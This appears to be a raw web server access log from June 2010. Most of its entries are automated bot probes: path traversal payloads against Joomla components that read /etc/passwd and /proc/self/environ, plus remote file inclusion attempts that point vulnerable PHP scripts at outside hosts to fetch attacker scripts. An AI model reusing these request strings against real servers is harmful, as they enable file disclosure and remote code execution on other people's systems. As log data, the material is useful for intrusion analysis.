69.175.84.122 - - [07/Jun/2010:01:16:18 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:16:20 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:16:20 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:16:21 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:16:21 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
93.89.215.70 - - [07/Jun/2010:01:16:22 -0500] "GET /logs/access_log.1273363200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:01:16:22 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:01:16:22 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
213.175.212.36 - - [07/Jun/2010:01:16:53 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:16:54 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:16:54 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:16:54 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:16:54 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:16:54 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:17:14 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:17:14 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:17:14 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
189.108.172.26 - - [07/Jun/2010:01:17:41 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:01:17:42 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
213.175.212.36 - - [07/Jun/2010:01:18:40 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:18:40 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:18:40 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:18:42 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:18:42 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:18:42 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:18:42 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:18:42 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:18:42 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
188.72.70.56 - - [07/Jun/2010:01:18:54 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:01:18:54 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:01:18:54 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
72.55.146.140 - - [07/Jun/2010:01:19:22 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:01:19:23 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:01:19:23 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:01:19:40 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:01:19:40 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:01:19:41 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
209.188.90.44 - - [07/Jun/2010:01:20:16 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
212.227.248.216 - - [07/Jun/2010:01:21:11 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
188.72.70.56 - - [07/Jun/2010:01:21:52 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:01:21:52 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:01:21:53 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
93.89.215.70 - - [07/Jun/2010:01:22:00 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
209.188.90.44 - - [07/Jun/2010:01:22:20 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:22:35 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
93.89.215.70 - - [07/Jun/2010:01:23:03 -0500] "GET /logs/access_log.1273017600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:01:24:53 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
213.175.212.36 - - [07/Jun/2010:01:25:48 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:25:51 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:25:51 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
189.108.172.26 - - [07/Jun/2010:01:25:52 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:01:25:52 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:01:25:56 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:01:26:24 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:01:26:24 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:01:26:25 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
72.55.146.140 - - [07/Jun/2010:01:28:13 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:01:28:16 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
209.188.90.44 - - [07/Jun/2010:01:31:56 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:31:56 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:31:56 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:34:07 -0500] "GET /logs/access_log.1274313600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:34:07 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:34:07 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:34:23 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:34:23 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:34:23 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
62.149.207.129 - - [07/Jun/2010:01:34:32 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:34:32 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:34:45 -0500] "GET /logs/access_log.1271548800//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
93.89.215.70 - - [07/Jun/2010:01:34:50 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:01:34:51 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:01:34:51 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
62.149.207.129 - - [07/Jun/2010:01:35:17 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:35:17 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:35:17 -0500] "GET /logs/access_log.1271548800//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
212.227.248.216 - - [07/Jun/2010:01:36:01 -0500] "GET /logs/access_log.1273622400/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:01:36:07 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:01:36:12 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.195.112.180 - - [07/Jun/2010:01:36:28 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.0.30 - - [07/Jun/2010:01:39:19 -0500] "GET /logs/access_log.1232668800//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.803"
94.23.0.30 - - [07/Jun/2010:01:39:22 -0500] "GET //components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.803"
94.23.0.30 - - [07/Jun/2010:01:39:26 -0500] "GET /logs//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 "-""libwww-perl/5.803"
189.108.172.26 - - [07/Jun/2010:01:40:07 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
189.108.172.26 - - [07/Jun/2010:01:40:26 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
88.191.94.188 - - [07/Jun/2010:01:42:48 -0500] "GET /logs/access_log.1271548800//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 337 "-""Mozilla/5.0"
88.191.94.188 - - [07/Jun/2010:01:42:48 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.94.188 - - [07/Jun/2010:01:42:48 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0"
67.195.112.180 - - [07/Jun/2010:01:43:25 -0500] "GET /logs/access_log.1164931200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.227.248.216 - - [07/Jun/2010:01:44:25 -0500] "GET /logs/access_log.1274832000/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:01:44:28 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0"
212.227.248.216 - - [07/Jun/2010:01:44:30 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:01:44:31 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.94.188 - - [07/Jun/2010:01:44:31 -0500] "GET /logs/access_log.1271548800//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 337 "-""Mozilla/5.0"
212.227.248.216 - - [07/Jun/2010:01:44:36 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.188.90.44 - - [07/Jun/2010:01:47:36 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
93.89.215.70 - - [07/Jun/2010:01:48:56 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
209.188.90.44 - - [07/Jun/2010:01:49:33 -0500] "GET /logs/access_log.1273017600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:50:06 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:50:27 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
93.89.215.70 - - [07/Jun/2010:01:51:09 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
204.236.235.245 - - [07/Jun/2010:01:54:05 -0500] "GET /tattoo/set1.htm HTTP/1.0" 200 2362 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
204.236.235.245 - - [07/Jun/2010:01:54:26 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.0" 200 3254 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
69.175.84.122 - - [07/Jun/2010:01:54:57 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:54:57 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:54:57 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:55:04 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:55:04 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:55:04 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:55:04 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
207.46.204.182 - - [07/Jun/2010:01:55:06 -0500] "GET /logs/access_log.1262908800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.188.90.44 - - [07/Jun/2010:01:55:22 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
88.191.94.188 - - [07/Jun/2010:01:56:08 -0500] "GET /bookmark4u.php?=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
88.191.94.188 - - [07/Jun/2010:01:56:08 -0500] "GET /logs/bookmark4u.php?=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 303 "-""Mozilla/5.0"
88.191.94.188 - - [07/Jun/2010:01:56:08 -0500] "GET /logs/access_log.1271548800/bookmark4u.php?=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 325 "-""Mozilla/5.0"
69.175.84.122 - - [07/Jun/2010:01:56:14 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:56:14 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:56:14 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:56:58 -0500] "GET /logs/access_log.1274832000/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:56:58 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
69.175.84.122 - - [07/Jun/2010:01:56:58 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.831"
209.188.90.44 - - [07/Jun/2010:02:01:30 -0500] "GET /logs/access_log.1273622400/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:01:30 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:01:30 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:01:35 -0500] "GET /logs/access_log.1273017600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:01:35 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:01:36 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
94.23.0.30 - - [07/Jun/2010:02:01:50 -0500] "GET /logs/access_log.1223683200//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.803"
93.89.215.70 - - [07/Jun/2010:02:02:33 -0500] "GET /logs/access_log.1274313600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:02:02:34 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:02:02:34 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:02:03:11 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.188.90.44 - - [07/Jun/2010:02:05:23 -0500] "GET /logs/access_log.1273363200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:05:23 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:02:05:23 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
